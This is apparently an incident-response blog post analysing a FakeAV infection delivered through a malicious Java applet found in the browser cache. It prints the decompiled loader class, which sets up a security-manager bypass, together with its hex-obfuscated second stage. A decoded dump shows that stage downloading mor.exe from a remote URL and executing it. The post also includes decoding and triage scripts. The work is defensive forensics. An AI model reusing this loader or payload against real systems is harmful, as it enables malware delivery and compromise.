The reason why I posted Part 1 of this series was that this particular incident was very similar. It was only due to my experience in my previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.
Again I received an image of a machine and was notified that antivirus had detected the following file:
Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n
I immediately noticed the similarity between this incident and my previous incident. I decided to start with the event logs again; however, in this instance I found one single entry and no tamper protection events as I had in Part 1:
Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.
I decided that the next logical step would be creating the directory listing and reviewing what occurred around the time of the alert. Reviewing the directory listing, I did not find any artifacts of interest. Due to my knowledge of the previous incident I decided to search for .idx files within the directory listing, and I found the following:
-A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed
-A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx
-A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23
D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..
D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.
D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0
-A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx
D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..
D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.
D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57
-A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245
-A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst
D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..
D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.
-A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\deployment.properties
-A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log
At this point I wasn't sure whether the following .idx files were part of the incident, but I decided, based on the previous incident, that they might be a good place to start.
74367697-78280468.idx
bffc1b9-44cf1245.idx
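The step above (scan the listing for .idx files near the alert, then locate the cached file each one describes) can be scripted. The following Python is an added example and not the post's own tooling: it parses the listing format shown above (attribute flags, two timestamps, path), narrows it to a time window, and pairs every .idx under the Deployment\cache tree with the sibling file of the same name minus the extension, which is the payload the post goes on to export. The post does not say which of the two timestamp columns is modified and which is created, so keying the window on the first column is an assumption; the listing lines are copied from the post, and the window centre is a constructed value.

```python
"""Added example: find Java deployment-cache entries in a directory listing and
pair each .idx with its cached payload. Not code from the post."""
import re
from datetime import datetime, timedelta

# Subset of the listing shown in the post (copied, not constructed).
LISTING = r"""
-A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed
-A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx
-A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468
D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23
-A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx
-A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245
-A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst
-A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log
"""

# attribute flags, timestamp, timestamp, path (the post's listing layout)
LINE_RE = re.compile(
    r"^(?P<attrs>[-A-Z]{9})\s+"
    r"(?P<ts1>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<ts2>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<path>.+?)\s*$")

def parse_ts(text):
    # %f accepts 1-6 fraction digits, so "49.79" and "00.704" both parse
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")

def parse_listing(text):
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or unparseable line: skip rather than guess
        entries.append({"attrs": m["attrs"], "ts1": parse_ts(m["ts1"]),
                        "ts2": parse_ts(m["ts2"]), "path": m["path"]})
    return entries

def in_window(entries, centre, minutes=5):
    """Entries whose first timestamp lies within +/- `minutes` of `centre`
    (assumption: the first column is the one worth keying on)."""
    delta = timedelta(minutes=minutes)
    return [e for e in entries if abs(e["ts1"] - centre) <= delta]

def java_cache_pairs(entries):
    """For every .idx under a Deployment\\cache tree return (idx_path, payload_path).
    payload_path is None when the cached file is gone, e.g. deleted by AV,
    which is itself worth noting in the timeline."""
    by_path = {e["path"].lower(): e for e in entries}
    pairs = []
    for e in entries:
        p = e["path"]
        if not (p.lower().endswith(".idx") and "\\deployment\\cache\\" in p.lower()):
            continue
        payload = by_path.get(p[:-4].lower())
        pairs.append((p, payload["path"] if payload else None))
    return pairs

def report(listing_text, centre, minutes=5):
    """Cache pairs restricted to the entries around the time of interest."""
    return java_cache_pairs(in_window(parse_listing(listing_text), centre, minutes))

if __name__ == "__main__":
    # constructed window centre: the AV event on the page carries no timestamp
    centre = parse_ts("2012-08-07 14:39:00.000")
    for idx, payload in report(LISTING, centre, minutes=1):
        print(idx)
        print("   ->", payload or "(payload missing)")
```

With a real listing this is run against the whole export rather than the subset, and entries whose payload comes back as None are exactly the ones to cross-check against the AV deletion events.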
At this point the URLs discovered in these files definitely looked suspicious, but I still needed more information to decide. I decided the next step was to start looking at some of the other files that I've highlighted in orange above:
74367697-78280468
I exported the file listed above and uploaded it to VirusTotal. Here are the results. Although there were only 3 hits, that was enough for me to gather further suspicion of the files. I renamed the file, added the .jar extension and attempted to open it with JD-GUI. Unfortunately I didn't have any success. I also attempted to rename the file to .exe and run it through Anubis, but I wasn't able to do that either. At this point I wasn't really sure what my next step could be with the file, so I decided to move on and focus on one of the other files. If anybody has any advice on this file I'd be keen to hear what my next steps might be.
bffc1b9-44cf1245
Again I uploaded the file listed above to VirusTotal to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with JD-GUI: SUCCESS! Here is the initial view I had when opening the file in JD-GUI.
I reviewed each of the classes above. The first two basically seemed like obfuscation and padding techniques to avoid antivirus, so I decided to spend my time focusing on O3. Below is what I reviewed when opening O3:
import java.lang.reflect.Method;
import java.net.URL;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

// Decompiled loader class: builds a ProtectionDomain carrying the
// "setSecurityManager" RuntimePermission, decodes a second class from the
// hex strings below, defines it under that domain and instantiates it.
class O3 extends ClassLoader
{
    static ProtectionDomain pd;

    public static char char_at(String paramString, int paramInt)
    {
        return paramString.charAt(paramInt);
    }

    // Fetches Class.newInstance via reflection so the decoded class is run through it
    public static Method get_func(Class paramClass) throws Exception
    {
        return paramClass.getClass().getMethod("newInstance", new Class[0]);
    }

    public static void invoke(Method paramMethod, Class paramClass) throws Exception
    {
        paramMethod.invoke(paramClass, new Object[0]);
    }

    // Permission name assembled from two literals rather than one string
    public static String get_perm_name()
    {
        return new StringBuffer("setSec").toString() + "urityManager";
    }

    // Hex string -> bytes; every byte has 3 subtracted (mod 256).
    // As a side effect, also builds the permissive ProtectionDomain used later.
    public static byte[] string_to_bytes(String paramString)
    {
        byte[] arrayOfByte = new byte[paramString.length() / 2];
        try
        {
            Permissions localPermissions = new Permissions();
            localPermissions.add(new RuntimePermission(get_perm_name()));
            pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);
        }
        catch (Exception localException) {
        }
        int i = paramString.length();
        for (int j = 0; j < i; j += 2)
        {
            int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);
            k = (k - 3) % 256;
            arrayOfByte[(j / 2)] = (byte)k;
        }
        return arrayOfByte;
    }

    public static void load(O3 paramO3)
    {
        try
        {
            int i = 1;
String[] arrayOfString = { "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", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", 
"0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030
C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };
            StringBuilder localStringBuilder = new StringBuilder();
            for (int j = 0; j < arrayOfString.length; j++)
            {
                localStringBuilder.append(arrayOfString[j]);
            }
            byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());
            // Define the decoded class under the permissive ProtectionDomain, then instantiate it
            Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);
            invoke(get_func(localClass), localClass);
        }
        catch (Exception localException)
        {
        }
    }
}
Basically, from what I can gather from this class file, it creates an array of strings (which I've highlighted in red). It then passes this array to the public static byte[] string_to_bytes(String paramString) method, which attempts to deobfuscate the code. At this point I was pretty lost, as I wanted to attempt to deobfuscate the string in the hope that it might provide me with a better understanding and potentially some new artifacts to search for within my image.
I decided to create my own Java application based on the application above. It would be a good chance for me to dust off some of my Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE, which I was familiar with.
I created the following class based on the output above; again, this is where I'm sure there are more efficient ways of doing this. My aim was to create a text file which listed the deobfuscated text within it. My class is as follows:
import java.io.*;

public class exploitMain {

    public static void main(String[] args) {
        load();
    }

    public static char char_at(String paramString, int paramInt)
    {
        return paramString.charAt(paramInt);
    }

    // Same decoding as O3.string_to_bytes: two hex digits per byte, minus 3 mod 256
    public static byte[] string_to_bytes(String paramString)
    {
        byte[] arrayOfByte = new byte[paramString.length() / 2];
        int i = paramString.length();
        for (int j = 0; j < i; j += 2)
        {
            int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);
            k = (k - 3) % 256;
            arrayOfByte[(j / 2)] = (byte)k;
            //System.out.println(k);
        }
        return arrayOfByte;
    }

    public static void load()
    {
        try
        {
String[] arrayOfString = { "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", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "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" };
            StringBuilder localStringBuilder = new StringBuilder();
            for (int j = 0; j < arrayOfString.length; j++)
            {
                localStringBuilder.append(arrayOfString[j]);
            }
            byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());
            //System.out.println(arrayOfByte);
            String temp = bytesToStringUTFCustom(arrayOfByte);
            writeToText(temp);
        }
        catch (Exception localException)
        {
            localException.printStackTrace(); // do not swallow failures silently
        }
    }

    // One char per byte. Mask with 0xFF so bytes >= 0x80 are not sign-extended
    // into chars above U+FF00, which the default Windows charset writes as '?'.
    public static String bytesToStringUTFCustom(byte[] bytes) {
        char[] buffer = new char[bytes.length];
        for (int i = 0; i < bytes.length; i++) {
            buffer[i] = (char)(bytes[i] & 0xFF);
        }
        return new String(buffer);
    }

    public static void writeToText(String output) throws IOException {
        File file = new File("c:/output.txt");
        BufferedWriter bo = new BufferedWriter(new FileWriter(file));
        bo.write(output);
        bo.close();
    }
}
It was rushed, so it's fairly messy and I haven't commented it. If you want to know anything further about it, please feel free to leave some comments and I'll get back to you as soon as I can. Finally, I reviewed my text file for further information.
???? 0 ~
' 2
3 4 5
6 7 8 9
6 : ; < =
> ?
@
A
B C D E
2 F
6 G
H I
J
@
K
L M
N O P Q R
S
T
T
U V
U W X Y Z [ <init> ()V Code LineNumberTable run ()Ljava/lang/Object;
Exceptions
SourceFile CL4.java ) * \ ] ^ 'java/security/PrivilegedActionException _ ` a http.keepalive false b c java/io/BufferedInputStream java/net/URL HTTp://www.XXXXXXX.pro/P4fLBitJ-PxK2/yUA83mE d e f ) g h i ) j java/io/BufferedOutputStream java/io/FileOutputStream java/lang/StringBuffer TEMP k l m n /mor.exe o f ) p q r 00047 s t u 00116 00120 00074 v w x * y z { | } java/lang/Exception CL4 java/lang/Object 'java/security/PrivilegedExceptionAction java/security/AccessController doPrivileged =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object; java/lang/System setSecurityManager (Ljava/lang/SecurityManager;)V setProperty 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; java/lang/String trim ()Ljava/lang/String; (Ljava/lang/String;)V
openStream ()Ljava/io/InputStream; (Ljava/io/InputStream;)V getenv &(Ljava/lang/String;)Ljava/lang/String; append ,(Ljava/lang/String;)Ljava/lang/StringBuffer; toString (Ljava/io/OutputStream;I)V read ([BII)I java/lang/Integer parseInt (Ljava/lang/String;)I write ([BII)V close java/lang/Runtime
getRuntime ()Ljava/lang/Runtime; exec '(Ljava/lang/String;)Ljava/lang/Process; ! & ' ( ) * + > *? *? W? L? ,
- . + ? & ? ? L = > ? W? Y? Y
? ? ?
? : ? Y? Y? Y? ? ? ? ? ? ? : + ? Y=? ? `> 6 ? x d ` ? ? i d ` p? + \3 ? ??T? H d ` p ? + \3 ? ??T? , d ` p ? + \3 ? ??T? + \3 ? ??T? ??? + ? ??g ? ! ? "? #: ? Y? ? ? ? ? ? $W? L ? # % , n
. X g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? = > C # @ $ D / % 0 1
It's difficult to make this output easy to read. I've highlighted the areas of interest in red. In particular, it shows an additional file and a URL on the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for, which unfortunately I did not find in this instance.
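The decoding described above (hex pairs, minus 3 modulo 256) and the review of the resulting dump can be done in one short script, which also answers the question of what the decoded bytes are: the leading runs of "23" decode to 0x20 spaces, and the rest carries the tag 01 / two-byte-length / text layout of class-file constant-pool entries, which is why the dump reads as a second class. The following Python is an added example, not the post's code or the malware's: it reverses the scheme, checks for the CAFEBABE class magic, pulls printable strings out of the result and flags the items worth searching an image for (URLs, matched case-insensitively because the sample spells the scheme "HTTp", dropped executables, and environment-variable names used to build the drop path). SAMPLE_FRAGMENT is copied from the arrayOfString literal in the decompiled O3 class; CONSTRUCTED_STAGE and the URL in it are constructed stand-ins, since the first element of the real array is not reproduced on the page.

```python
"""Added example (not the post's code): decode the O3 loader's hex string and
list indicators found in the result. Assumes the scheme decompiled above: two
hex digits per byte, each byte stored as (original + 3) mod 256."""
import re

def deobfuscate(hex_text: str) -> bytes:
    """Reverse O3.string_to_bytes: hex pair -> int, subtract 3 modulo 256."""
    hex_text = "".join(hex_text.split())  # tolerate pasted line breaks
    if len(hex_text) % 2:
        raise ValueError("odd number of hex digits")
    return bytes((int(hex_text[i:i + 2], 16) - 3) % 256
                 for i in range(0, len(hex_text), 2))

def obfuscate(data: bytes) -> str:
    """Inverse of deobfuscate; used only to build constructed test input."""
    return "".join(f"{(b + 3) % 256:02X}" for b in data)

def is_class_file(data: bytes) -> bool:
    """CAFEBABE at offset 0 means the loader is handing defineClass() a
    second-stage class rather than plain data."""
    return data[:4] == b"\xca\xfe\xba\xbe"

def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Printable-ASCII runs, dropping the all-space padding the loader
    prepends (every "23" pair decodes to 0x20)."""
    runs = re.findall(rb"[ -~]{%d,}" % min_len, data)
    return [r.decode("ascii") for r in runs if r.strip()]

def find_indicators(strings: list) -> dict:
    """Heuristic triage of the strings: URLs in any case, dropped
    executables, and environment variables used to build the drop path."""
    urls = [s for s in strings if re.search(r"https?://", s, re.I)]
    executables = [s for s in strings if re.search(r"\.(exe|dll|scr)$", s, re.I)]
    env_vars = [s for s in strings if re.fullmatch(r"[A-Z_]{3,}", s)]
    return {"urls": urls, "executables": executables, "env_vars": env_vars}

# Copied from the arrayOfString literal in the decompiled O3 class above:
# five constant-pool Utf8 entries (tag 01, two-byte length, text) and two
# NameAndType entries between them.
SAMPLE_FRAGMENT = (
    "04031F6D647964326C72324578696968756867527877737877567775686470"
    "04031B6D647964326C7232496C6F68527877737877567775686470"
    "0403196D647964326F64716A325677756C716A457869696875"
    "04030757485053"
    "0F036E036F0F03700371"
    "04030B3270727531687B68"
)

# Constructed stand-in for a complete decoded stage (the post does not
# reproduce the real header): class magic, version, one Utf8 entry with a URL.
CONSTRUCTED_URL = "HTTp://malware.example/stage2"
CONSTRUCTED_STAGE = (b"\xca\xfe\xba\xbe\x00\x00\x00\x32"
                     + b"\x01" + len(CONSTRUCTED_URL).to_bytes(2, "big")
                     + CONSTRUCTED_URL.encode())

def analyse(hex_text: str) -> dict:
    """Decode, classify and triage one obfuscated blob."""
    data = deobfuscate(hex_text)
    strings = extract_strings(data)
    result = {"is_class_file": is_class_file(data), "strings": strings}
    result.update(find_indicators(strings))
    return result

if __name__ == "__main__":
    for label, blob in (("page fragment", SAMPLE_FRAGMENT),
                        ("constructed stage", obfuscate(CONSTRUCTED_STAGE))):
        print(label, analyse(blob))
```

On the page fragment this yields java/io/BufferedOutputStream, java/io/FileOutputStream, java/lang/StringBuffer, TEMP and /mor.exe, i.e. the same names that appear in the post's dump, without the sign-extension noise; on a full decoded stage, is_class_file() being true is the cue to write the bytes out with a .class extension and open them in JD-GUI directly instead of reading the raw dump.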
I hope you find this to be useful, and hopefully some of you may comment on more efficient ways of doing what I've done above. I would love to gather any advice from anyone that does this on a more regular basis.
> It's difficult to make this output easy to read
Wha-ha-ha, obviously, you got another class file as output. Lucky you, it had string constants defined as plain text.